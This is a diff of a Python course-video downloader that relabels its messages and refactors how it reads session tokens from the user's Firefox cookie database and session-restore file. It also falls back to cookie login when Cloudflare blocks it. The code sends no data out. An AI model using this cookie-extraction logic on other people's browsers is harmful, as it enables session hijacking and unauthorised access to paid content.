@@ -21,7 +21,7 @@ import wget
 import youtube_dl
 from bs4 import BeautifulSoup
 
-__version__ = "v1.7.36"
+__version__ = "v1.7.40"
 
 SECTION, SECTION_START, SECTION_END, INFO, COOKIE, COOKIE_STORE, AUTO_LOAD, FETCH_BROWSER_COOKIE = None, None, None, None, None, None, None, None
 s = requests.session()
@@ -35,6 +35,7 @@ class DL:
         self.email, self.password = "", ""
 
         self._cookie = None
+
         self.parentFolder = os.getcwd()
         self.main()
 
@@ -64,6 +65,7 @@ class DL:
                 if login_url:
                     return login_url
                 else:
+
                     print("[-] Invalid course URL.")
                     self.login()
 
@@ -82,7 +84,7 @@ class DL:
 
                 browser = str(FETCH_BROWSER_COOKIE)
 
-                copy_cmd = "cp "
+                copy_cmd = "cp -n "
                 if sys.platform == 'darwin':
                     lz4file = os.path.join(
                         os.path.expanduser(
@@ -129,21 +131,23 @@ class DL:
                     with open(home_lz4file, 'rb') as f:
                         f.read(8)
                         lz4_dec = lz4.decompress(f.read())
-                        lz4_dec = str(lz4_dec)
+                        lz4_dec = lz4_dec.decode()
+                    _domain = self.get_domain()[8:]
+                    value = re.findall(
+                        f"\"host\":\"{_domain}\",\"value\":\"[^\"]*\",\"path\":\"/\",\"name\":\"sk_[^\"]*_access\",\"secure\":true,\"httponly\":true",
+                        lz4_dec.strip(), re.I)
+                    value = ("{" + value[0] + "}")
 
-                        p1 = '{"host":"' + (self.get_domain()[8:]) + '","value":"ey'
-                        p2 = '_access","secure":true,"httponly":true,'
+                    token = json.loads(value)
 
-                        poz1 = lz4_dec.find(p1)
-                        poz2 = lz4_dec[poz1:].find(p2) + poz1 + 7
-                        value = lz4_dec[poz1:poz2]
-
-                        token.append(str(value) + '"}')
-
-                    token = json.loads(token[0])
                     return token['host'], token['value'], token['name']
 
                 except ValueError as e:
+
+                    return (self.get_domain()[8:]), "value:false", "name:false"
+
+                except IndexError as e:
+                    print(f"[-] Error: Could not find the cookies")
                     return (self.get_domain()[8:]), "value:false", "name:false"
 
                 except Exception as e:
@@ -166,13 +170,13 @@ class DL:
 
             def fetch_browser_cookie():
                 browser = str(FETCH_BROWSER_COOKIE)
-                print("Browser: " + browser)
+                print("[i] Browser: " + browser)
 
                 if browser not in ('firefox', 'firefox-snap'):
-                    raise Exception(f'Unsupported browser {browser}')
+                    raise Exception(f' [-] Unsupported browser {browser}')
                     sys.exit(1)
 
-                copy_cmd = "cp "
+                copy_cmd = "cp -n "
                 if sys.platform == 'darwin':
                     sqlfile = os.path.join(
                         os.path.expanduser('~/Library/Application\ Support/Firefox/Profiles/*.default*/cookies.sqlite'))
@@ -194,7 +198,7 @@ class DL:
 
 
                 else:
-                    raise Exception('Unsupported operating system: ' + sys.platform)
+                    raise Exception('[-] Unsupported operating system: ' + sys.platform)
 
                 cp_cmd = copy_cmd + os.path.join(os.path.expanduser(sqlfile)) + " " + HOMEFOLDER
                 # Z2V0IHlvdXIga2V5IGhlcmUgaHR0cHM6Ly93d3cuYnV5bWVhY29mZmVlLmNvbS9sL2diZGw=
@@ -254,13 +258,13 @@ class DL:
 
                 if self._cookie is None:
                     try:
-                        self._cookie = raw_input("Enter cookie instead : ")
+                        self._cookie = raw_input("Enter cookie instead > ")
 
                     except Exception as e:
-                        self._cookie = input("Enter cookie instead: ")
+                        self._cookie = input("Enter cookie instead > ")
 
             if self._cookie is not None:
-                print("Trying cookie authentication ...")
+                print("[i] Trying cookie authentication ...")
                 token = get_sk_access_token()
 
                 validate_course_url()
@@ -268,6 +272,7 @@ class DL:
 
                 s.cookies.set('_session_id', cookie, path='/', domain=self.get_domain()[8:])
                 s.cookies.set(token[2], token[1], path='/', domain=self.get_domain()[8:])
+                s.cookies.set('secure', 'True', path='/', domain=self.get_domain()[8:])
 
                 data = s.get(self.url)
 
@@ -292,27 +297,27 @@ class DL:
             else:
                 try:
 
-                    self.course_url = raw_input("Enter course url : ").strip()
+                    self.course_url = raw_input("Enter course url > ").strip()
 
                     if self._cookie is None and not AUTO_LOAD and not FETCH_BROWSER_COOKIE:
-                        self.email = raw_input("Email : ")
-                        prompt_txt = "Password :"
+                        self.email = raw_input("Email > ")
+                        prompt_txt = "Password > "
                         self.password = getpass.getpass(prompt=prompt_txt, stream=sys.stderr)
 
                 except TypeError as e:
-                    prompt_txt = "Password :"
+                    prompt_txt = "Password > "
                     prompt_txt = prompt_txt.encode("utf-8")
                     self.password = getpass.getpass(prompt=prompt_txt, stream=sys.stderr)
 
                 except Exception as e:
-                    self.course_url = input("Enter course url : ").strip()
+                    self.course_url = input("Enter course url > ").strip()
                     if self._cookie is None and not AUTO_LOAD and not FETCH_BROWSER_COOKIE:
-                        self.email = input("Email : ")
-                        self.password = getpass.getpass(prompt="Password : ", stream=sys.stderr)
+                        self.email = input("Email > ")
+                        self.password = getpass.getpass(prompt="Password > ", stream=sys.stderr)
 
             if self.email and self.password and self.course_url:
                 try:
-                    print("Trying to Login ...")
+                    print("[i] Trying to Login ...")
 
                     login_url = validate_course_url()
 
@@ -350,7 +355,7 @@ class DL:
                         sys.exit(1)
 
                     except scrape.exceptions.CloudflareException as ex:
-                        print("Cloudflare reCaptcha detected")
+                        print("[i] Cloudflare reCaptcha detected")
                         cookie_authentication()
 
                     self.get_section_and_links(self.course_url)
@@ -375,19 +380,13 @@ class DL:
     def get_domain(self):
         try:
             self.url = self.course_url
-
-            if 'com' in self.url:
-                index = self.url.index('com') + 3
-
-            elif '.co' in self.url:
-                index = self.url.index('.co') + 3
-            elif '.io' in self.url:
-                index = self.url.index('.io') + 3
-            else:
-                index = self.url.index('net') + 3
-
-            return self.url[0:index]
-        except ValueError:
+            tlds = ['com', '.co', '.io', '.es', 'net']
+            for tld in tlds:
+                if tld in self.url:
+                    index = self.url.index(tld) + 3
+                    return self.url[0:index]
+        except ValueError as e:
+            print(e)
             print("[-] Invalid course URL.")
             self.login().validate_course_url()
 
@@ -395,13 +394,14 @@ class DL:
 
         self.domain = self.get_domain()
         uname = None  # self.get_user(s)
-        print("Getting sections")
+        print("[i] Getting sections")
         print("[+] Logged in successful")
 
         try:
 
             print("Downloading to :" + self.parentFolder)
             print("Collecting course information ...")
+            course_name = None
 
             data = requests.get(self.url)
             soup = BeautifulSoup(data.text, 'html.parser')
@@ -418,7 +418,7 @@ class DL:
                 try:
 
                     course_name = soup.find('div', attrs={'class': 'details-container'}).find('h1')
-                except Exception as TypeError:
+                except TypeError as e:
                     course_name = None
 
             elif 'nihongowa' in self.url:
@@ -435,24 +435,31 @@ class DL:
                 course_name = soup.find('div', attrs={'class': 'course-sidebar'}).find('h2')
 
             elif 'millionaire-journey' in self.url:
-
                 course_name = None
 
             else:
-                soup = BeautifulSoup(data.text, 'html.parser')
+                try:
+                    soup = BeautifulSoup(data.text, 'html.parser')
 
-                # course_name = soup.find('h2', attrs={'class': 'row'})
+                    if course_name is None:
+                        course_name = soup.find('h2', attrs={'class': 'row'})
 
-                course_name = soup.find('h1', attrs={'class': 'course-title'})
+                    if course_name is None:
+                        course_name = soup.find('h1', attrs={'class': 'course-title'})
 
-                if course_name is None:
-                    course_name = soup.find('h1', attrs={'class': 'm-0'})
+                    if course_name is None:
+                        course_name = soup.find('h1', attrs={'class': 'm-0'})
 
-                if course_name is None:
-                    course_name = soup.find('div', attrs={'class': 'bannerHeader'}).find('h2')
+                    if course_name is None:
+                        try:
+                            course_name = soup.find('div', attrs={'class': 'bannerHeader'}).find('h2')
+                        except TypeError as e:
+                            course_name = None
+
+                except Exception as e:
+                    print(f"[-] Failed to get course name, setting course name to Unknown course.")
 
             if course_name is None:
-                print("Failed to get course Name , course name set to Unknown course")
                 course_name = "Unknown course"
 
             else:
@@ -467,7 +474,7 @@ class DL:
             os.chdir(self.parentFolder)
             course_name = self.create_and_change_dir(course_name).strip()
 
-            print("Getting course sections ...")
+            print("[i] Getting course sections ...")
 
             data = s.get(self.url)
             soup = BeautifulSoup(data.text, 'html.parser')
@@ -475,7 +482,7 @@ class DL:
             try:
                 course_image = soup.find('div', {'class': 'course-image'}).find('img').get('src')
 
-                print("Downloading course image ... ")
+                print("[i] Downloading course image ... ")
 
                 wget.download(str(course_image))
 
@@ -483,7 +490,7 @@ class DL:
                 try:
                     course_image = soup.find('img', {'class': 'course-image'}).get('src')
 
-                    print("Downloading course image ... ")
+                    print("[i] Downloading course image ... ")
 
                     wget.download(str(course_image))
 
@@ -618,7 +625,7 @@ class DL:
         attachments = []
 
         for link in links:
-            print("Preparing  lecture " + str(c) + " of " + str(total_lectures) + " download ... ")
+            print("[i] Preparing  lecture " + str(c) + " of " + str(total_lectures) + " download ... ")
 
             data2 = s.get(link)
             soup1 = BeautifulSoup(data2.text, 'html.parser')
@@ -664,7 +671,7 @@ class DL:
             course_url = self.wistia_url + id
 
             try:
-                print("Starting download ... ")
+                print("[i] Starting download ... ")
                 ydl_opts = {}
                 with youtube_dl.YoutubeDL(ydl_opts) as ydl:
                     ydl.download([course_url])
@@ -682,7 +689,7 @@ class DL:
                             self.url = str((x["href"]).strip('[]'))
                         # self.url = self.url[2:-1].strip()
 
-                        print("Downloading attachment : " + self.name)
+                        print("[i] Downloading attachment : " + self.name)
                         filesrc = wget.download(str(self.url))
 
                         os.rename(filesrc, str(self.name))
@@ -692,7 +699,7 @@ class DL:
                     print("[-]" + "Error can not download attachment  : " + str(ex))
 
     def sanitize_file_names(self):
-        print("Sanitizing file names ...")
+        print("[i] Sanitizing file names ...")
 
         path = self.parentFolder
 
@@ -707,18 +714,19 @@ class DL:
                         os.rename(file_src, file_dest)
 
                 except Exception as e:
+                    print(f"[i] {e}")
                     pass
         print("[+]" + " File name sanitation completed")
 
     def create_and_change_dir(self, dir_name):
         """ Creates and changes directory if dir name has invalid chars """
 
-        self.dir_name = dir_name
+        self.dir_name = re.sub('[^a-zA-Z0-9 \n\.]', '', dir_name)
 
-        invalid_chars = ['<', '>', ':', '"', '/', '|', '\\', '?', '*']
-        for char in invalid_chars:
-            if char in dir_name:
-                self.dir_name = dir_name.replace(char, "")
+        # invalid_chars = ['<', '>', ':', '"', '/', '|', '\\', '?', '*']
+        # for char in invalid_chars:
+        #     if char in dir_name:
+        #         self.dir_name = dir_name.replace(char, "")
 
         if os.path.exists(self.dir_name):
             os.chdir(self.dir_name)
@@ -863,7 +871,7 @@ if __name__ == '__main__':
         DL = DL()
 
     except KeyboardInterrupt:
-        print("\nUser Interrupted.")
+        print("\n[-] User Interrupted.")
         sys.exit(1)
 
     except Exception as e:
